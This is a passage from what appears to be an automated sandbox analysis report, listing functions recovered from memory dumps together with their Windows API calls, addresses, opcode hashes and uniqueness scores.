                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: b00be10b917e25d4023696684f8dceff8ae3e33f2575f1d894e839b8f7705ffc
                                                    • Instruction ID: 4b9b80cf040294345edc0c71d809644d0ec04f10903eb2aa95c37c418fb3b9f0
                                                    • Opcode Fuzzy Hash: b00be10b917e25d4023696684f8dceff8ae3e33f2575f1d894e839b8f7705ffc
                                                    • Instruction Fuzzy Hash: F311C472500300EFEB21DF55DC85BAAFBE8EF44720F14846AED499B581D770A904DBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0209BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9fa8ef4fc8a7fc61a593c7edc406036cf99c094c0b21d353e5b5f57ff22682e2
                                                    • Instruction ID: ef2a9728c23e40e9f27103cf54d98aa9f0d5af6c01b11f9dc054720b981bc3a7
                                                    • Opcode Fuzzy Hash: 9fa8ef4fc8a7fc61a593c7edc406036cf99c094c0b21d353e5b5f57ff22682e2
                                                    • Instruction Fuzzy Hash: 97116D72504384AFDB22CF65DC85B52FFF4EF05220F08859AED8A8B662D375A418DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 499f16bbe8dad44c9c028ade19d9bc7be297bbfbc355436fe71a268d17075add
                                                    • Instruction ID: a63986a18067688688fc51f345e5237aca0c06245b64dbec34f5970af2e40d60
                                                    • Opcode Fuzzy Hash: 499f16bbe8dad44c9c028ade19d9bc7be297bbfbc355436fe71a268d17075add
                                                    • Instruction Fuzzy Hash: 5211C172500300EFFB21CF51DC85FA6FBA8EF14720F04855AED499A641D771A508CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 3d677c195f67e2cb93b0f8435f491c28066525ea78629d5728b3d3c7d7136cb9
                                                    • Instruction ID: 1e7a4f70012d44570861874b3d4ff02546500e7c9712448680f920ca0b8be048
                                                    • Opcode Fuzzy Hash: 3d677c195f67e2cb93b0f8435f491c28066525ea78629d5728b3d3c7d7136cb9
                                                    • Instruction Fuzzy Hash: AC118F715093C09FEB128B15DC54B62BFB4DF47624F0880CAEDC54F653D265A808DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 68f05e8fcfff6fe5debda7136e29162ab3a9515f894149de814f524731a3b1ae
                                                    • Instruction ID: ac7bce9ce963bc80df514d38aa4bbd105e718fdf0df161f8237710fba78d972b
                                                    • Opcode Fuzzy Hash: 68f05e8fcfff6fe5debda7136e29162ab3a9515f894149de814f524731a3b1ae
                                                    • Instruction Fuzzy Hash: 301191715093849FDB11CF25DC89B96FFA4EF06220F0984EEED898B652D375A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 941a01bf7dd9becef0d9cc4feb33804513f2e8e58e38eb3c2e6766f8780f986e
                                                    • Instruction ID: b2f84be6cf271aed7cb450379d1db53161a77035ae6ab3a083a5c89244db92ee
                                                    • Opcode Fuzzy Hash: 941a01bf7dd9becef0d9cc4feb33804513f2e8e58e38eb3c2e6766f8780f986e
                                                    • Instruction Fuzzy Hash: 4A11C2755093C09FDB128B15DC99B52FFB4EF46224F0880DBED858B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0209AA71
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 50592188db8c724067d64cb90bd39ff0162324bdd48e48a6cf44dc2f7d6c935a
                                                    • Instruction ID: a0327c9c20191dcd0eb693cf9375754119d79994cfbdff6e6ead7c7ac0322439
                                                    • Opcode Fuzzy Hash: 50592188db8c724067d64cb90bd39ff0162324bdd48e48a6cf44dc2f7d6c935a
                                                    • Instruction Fuzzy Hash: 4311C1755097C09FDB128B11DC85B92BFA0EF03220F0980DBDD858F163D368A909DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0209AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 5b3bcc72615ba5315205054ed2c27e90b6e7f662721bb1f1d562def9fc5b8e8a
                                                    • Instruction ID: 081f886a0c4ab53513c9cfb59be43aeb7f93ff832673fa4a787c844c4ebb5fe1
                                                    • Opcode Fuzzy Hash: 5b3bcc72615ba5315205054ed2c27e90b6e7f662721bb1f1d562def9fc5b8e8a
                                                    • Instruction Fuzzy Hash: 64115EB17003409FEF61DF25DC85B56FBE8EB05621F08846AED4ACB642E774E444EA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: e0f6e4049f9d8c865994f04b1cd21ec469d94d1cfca8cafda041af2a629ccf15
                                                    • Instruction ID: b0b5ba91961de5a456527f1a9865e48e7327c843dd5e00df5af052b61d6dced6
                                                    • Opcode Fuzzy Hash: e0f6e4049f9d8c865994f04b1cd21ec469d94d1cfca8cafda041af2a629ccf15
                                                    • Instruction Fuzzy Hash: 19119D715093C09FEB12CB25DC55B92BFA4EF07324F0980DADD844B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 81c48b00fa4bec7082eb448d5e9434ff59e73bb8c6baec340aa55b5c2263a01b
                                                    • Instruction ID: 9f1e4504456a24e0300637eb9c87441527b7828d68058f7f5f9d51e0d8469418
                                                    • Opcode Fuzzy Hash: 81c48b00fa4bec7082eb448d5e9434ff59e73bb8c6baec340aa55b5c2263a01b
                                                    • Instruction Fuzzy Hash: 7D01CC71500304EFFB20DF11DC86BA6FB98EF04720F1480AAFD099A681D674A908CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 89754f7cf64850fe21095430a76f73dde8674d164e0a2e7ff181e3d53ad20b9c
                                                    • Instruction ID: 9390c207c96ce7be597d4313c8ff5fb3a1ad79b09a96a0db93ec4df4f536fe70
                                                    • Opcode Fuzzy Hash: 89754f7cf64850fe21095430a76f73dde8674d164e0a2e7ff181e3d53ad20b9c
                                                    • Instruction Fuzzy Hash: 9F11A175510700DFEF20CF56DC85B66FBA4EF04620F08C4AADD499BA51D371E458CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0209ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 37410190b9dbfc47694f41f04a6cd71cde4453c6169afec3a467723e38c094b9
                                                    • Instruction ID: 7869a595851680e2081678855e09b1debacfbfca7343cf5828655693338fea06
                                                    • Opcode Fuzzy Hash: 37410190b9dbfc47694f41f04a6cd71cde4453c6169afec3a467723e38c094b9
                                                    • Instruction Fuzzy Hash: E111CEB55093809FDB11CF25EC85B82BFA4EF02220F0980ABDD498F253D374A508CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0209BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 6cac14720a9b3427efad56d918aafd44e6b1491099516b7fdc273a7c3be30bcd
                                                    • Instruction ID: 9d311fc3286c4f06bac004f17390c82f30f34c91bc3649b4400a8465d43de33e
                                                    • Opcode Fuzzy Hash: 6cac14720a9b3427efad56d918aafd44e6b1491099516b7fdc273a7c3be30bcd
                                                    • Instruction Fuzzy Hash: 1811A172500704DFDF21CF55EC84B56FBE4FF08624F0885AADD8A8A612D371E418EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0209A23E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 864fdb1e89c54e568eaf7e8ba937db2bdbc35621b58c137420cfc6d5f40ea82e
                                                    • Instruction ID: 9016e55aed1dae93f97f8936ad2fc84c2ba6d399ad12e7d058dcd82efcd3642d
                                                    • Opcode Fuzzy Hash: 864fdb1e89c54e568eaf7e8ba937db2bdbc35621b58c137420cfc6d5f40ea82e
                                                    • Instruction Fuzzy Hash: 73018471900600AFE710DF16DC46B66FBA8FB88A60F14816AED089B741E375F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 653c7930c4856d8eadf709153840d5171021c5079d2156b9daaa31ecb88c08be
                                                    • Instruction ID: c18d8ef31f48dc22f9ab5b76e30b991f63b8b9513c19b50025331b5354f77ac9
                                                    • Opcode Fuzzy Hash: 653c7930c4856d8eadf709153840d5171021c5079d2156b9daaa31ecb88c08be
                                                    • Instruction Fuzzy Hash: 55018471900600AFE310DF16DC46B66FBA8FB88B60F14816AED099B741E375F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 99b6027e72f0a71675187bf597f669a17801dec02f1364dca1b59f59d3870e9b
                                                    • Instruction ID: 1cd7ec8e59e3117715111fec0561e49364e23f7c14f1ea5a7ecefaeafd811e72
                                                    • Opcode Fuzzy Hash: 99b6027e72f0a71675187bf597f669a17801dec02f1364dca1b59f59d3870e9b
                                                    • Instruction Fuzzy Hash: BE019E726003448FEB10DF26DC8576AFB98EB01220F1884AADC09CB642E774E404CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0209BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 22c1054638235ed3322b5d877caf7b6b3a4315c79ed9e4f8df7950b29cff6dcf
                                                    • Instruction ID: 9b80c8f12a6e3521f8562edddd5a4b611632e5e2c93e3faa07399ee8edb88a91
                                                    • Opcode Fuzzy Hash: 22c1054638235ed3322b5d877caf7b6b3a4315c79ed9e4f8df7950b29cff6dcf
                                                    • Instruction Fuzzy Hash: ED01B171500340DFEF10CF15EC85765FBA4EF04634F08C4AADD4A8B696D3759404EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 7faa46f5c0c4c111a09bd43e9806f9fdcc1a9a1b523bf1cc8dc42e8dc9944aa8
                                                    • Instruction ID: d0cf1faf604a11283fc48aba8a6150a390e4e11df1ad6e40423bc9729ad099c2
                                                    • Opcode Fuzzy Hash: 7faa46f5c0c4c111a09bd43e9806f9fdcc1a9a1b523bf1cc8dc42e8dc9944aa8
                                                    • Instruction Fuzzy Hash: D101DF71500340DFEF10CF15DC857A5FBA4EF04620F48C4AADC499BA42E375A408CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0209A94A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 3cd85d3704d5f1ab660f9b3ab4568661e938b9b24204bdd09cfaae7eb57879b8
                                                    • Instruction ID: 47f0e193d3b708a56299d4688417ba2e202cba0aedf6dc56409de64d4c84de84
                                                    • Opcode Fuzzy Hash: 3cd85d3704d5f1ab660f9b3ab4568661e938b9b24204bdd09cfaae7eb57879b8
                                                    • Instruction Fuzzy Hash: EA018671900600ABD310DF16DC46B26FBB4FB88B20F14825AED085BB41E375F555CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: e4a5f1ce3168c568af08f4520de854280a3cc2e7ef8b9a220d1b04c9cfc7d03a
                                                    • Instruction ID: 28917595d43cd58ea1fc9cd454f75c60259c1955f060af456ee0e8a6864d71df
                                                    • Opcode Fuzzy Hash: e4a5f1ce3168c568af08f4520de854280a3cc2e7ef8b9a220d1b04c9cfc7d03a
                                                    • Instruction Fuzzy Hash: 35017871900344DFEB20DF16D885B66FBA4EB06660F0884AADC48DF646E774E448CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 3b7f1ce20f47160a7098c1471a131bc4971709c02833e7572653fdea2a5e9b7d
                                                    • Instruction ID: 79ca7681377973b15908fa81150b4e97385207d23f31519367b4756e0da68ad5
                                                    • Opcode Fuzzy Hash: 3b7f1ce20f47160a7098c1471a131bc4971709c02833e7572653fdea2a5e9b7d
                                                    • Instruction Fuzzy Hash: 6C016271900600ABD310DF16DC46B26FBA4FB88B20F14825AED085BB41E375F555CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: f874fc9e8d84fb3735c56e504e1bb9563d21a3c1cdc0f724caffe55cc3cba762
                                                    • Instruction ID: c4a66fc9287d48c1825473d51d4c75b09fc6d46fa98f825b1e0c20758ef18112
                                                    • Opcode Fuzzy Hash: f874fc9e8d84fb3735c56e504e1bb9563d21a3c1cdc0f724caffe55cc3cba762
                                                    • Instruction Fuzzy Hash: 0801F435600740CFEF108F15D889761FBA0EF45620F08C0AADC498BB52D374E448CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0209ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: a4833c67f6054fd3c9eb8fb8b4773998f1819878dd6df2726b59eaf64a17a6a2
                                                    • Instruction ID: 21fb7484b5e332f73f1ec3d744e85d0833f0e6078bcfdc7b73ff56e9c467ab7c
                                                    • Opcode Fuzzy Hash: a4833c67f6054fd3c9eb8fb8b4773998f1819878dd6df2726b59eaf64a17a6a2
                                                    • Instruction Fuzzy Hash: 2A01D171604340CFEF10DF15DC85B95FBA4EF00220F08C0AACD498F602D774A444DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: e5ecf239ee2066d0313e3c548944aee1fa68e14ca126aeb84bc88e0c29264e92
                                                    • Instruction ID: a6c4dd045dbf82387b789193ea15c3e8c8c369699dd9bfb963d00ecd4684201b
                                                    • Opcode Fuzzy Hash: e5ecf239ee2066d0313e3c548944aee1fa68e14ca126aeb84bc88e0c29264e92
                                                    • Instruction Fuzzy Hash: BCF08C35500640DFEB20CF05D889765FBA4EB05A21F48C19ADD495F712E675A548CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 202baa20eb9e43a38cfa75f934fc9459a0e5de8f3ec97c57fdd61d020dbba5cd
                                                    • Instruction ID: 553d0640b90476bcb8a0461005f6dc47654a44fa7b4000097387a1c1518ef89d
                                                    • Opcode Fuzzy Hash: 202baa20eb9e43a38cfa75f934fc9459a0e5de8f3ec97c57fdd61d020dbba5cd
                                                    • Instruction Fuzzy Hash: 0EF0AF35604740DFEF20DF06D8C9765FBA0EF04621F08C09AED4A4B712E375A448EAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 83b7e762bdc7122e0e120582c7090e259ba18c590a949bcf7caf6781cb1ae680
                                                    • Instruction ID: 9b8aa219ce079561e4992ef75c813296ed350133ae6418fbc14eee7a6f0c1f35
                                                    • Opcode Fuzzy Hash: 83b7e762bdc7122e0e120582c7090e259ba18c590a949bcf7caf6781cb1ae680
                                                    • Instruction Fuzzy Hash: EEF0A935904740DFEF20DF06D889766FBA0EF15621F08C09ADD895B716E375A448CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0209AA71
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 5d01624f503fd6c91291b54161ccb1e6b79b1e924fc2f50662a67516de7e5fa6
                                                    • Instruction ID: 3611af7a1771b4298a451b8193669ad6c78f9daadf7ad7c887515c34fedd4e36
                                                    • Opcode Fuzzy Hash: 5d01624f503fd6c91291b54161ccb1e6b79b1e924fc2f50662a67516de7e5fa6
                                                    • Instruction Fuzzy Hash: 37F0CD35600B44CFEF10CF06D989762FBA0EF44621F08C09ADD4A4F652E378A548EAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0209A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: e91e1ae98589c250252da868b86263f119fb1ed00c436c6f9a9f826fad1f4896
                                                    • Instruction ID: 6e9d58a57daf539772136dd6b68f62b671e284285eb73942899a88c6aa8694f3
                                                    • Opcode Fuzzy Hash: e91e1ae98589c250252da868b86263f119fb1ed00c436c6f9a9f826fad1f4896
                                                    • Instruction Fuzzy Hash: 001194715093809FDB12CB15DC45B92BFA4DF06220F0980ABDD858B652D375A808DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0209A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 62c655743a17c25e290be6a64c734994e5e854368c18680421173c8904d31d50
                                                    • Instruction ID: 6de95edda52918a763bb9ea4268be8f207f9e75d1bea1d8941d3a97f0a61850d
                                                    • Opcode Fuzzy Hash: 62c655743a17c25e290be6a64c734994e5e854368c18680421173c8904d31d50
                                                    • Instruction Fuzzy Hash: D801DF71600740CFEF10DF15D8897A6FBA4EF05220F08C0AADC4A8B642D375A808EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028307F7, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124992374.0000000002830000.00000040.00000040.sdmp, Offset: 02830000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4df8ad280a13e752f1281f723fd5488d637883288cc910f9e71b9a219f1ab32b
                                                    • Instruction ID: 19562e5ab072c231206611c8fad109439283abc6c3c03412708bc76dc5d3067c
                                                    • Opcode Fuzzy Hash: 4df8ad280a13e752f1281f723fd5488d637883288cc910f9e71b9a219f1ab32b
                                                    • Instruction Fuzzy Hash: F901A7755497809FC7518F16EC40853BFF8EF46670709C0ABEC898B612D225A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05710860, Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2136981702.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d06e91bf6a0be4b302c8a51bee5607c3d0ff1d1ba2c0f30d52051cf5a54f8884
                                                    • Instruction ID: ea533318f319007a4f6aaa81973d27ed36eca73f4581d2e44ba38c34f32a49b3
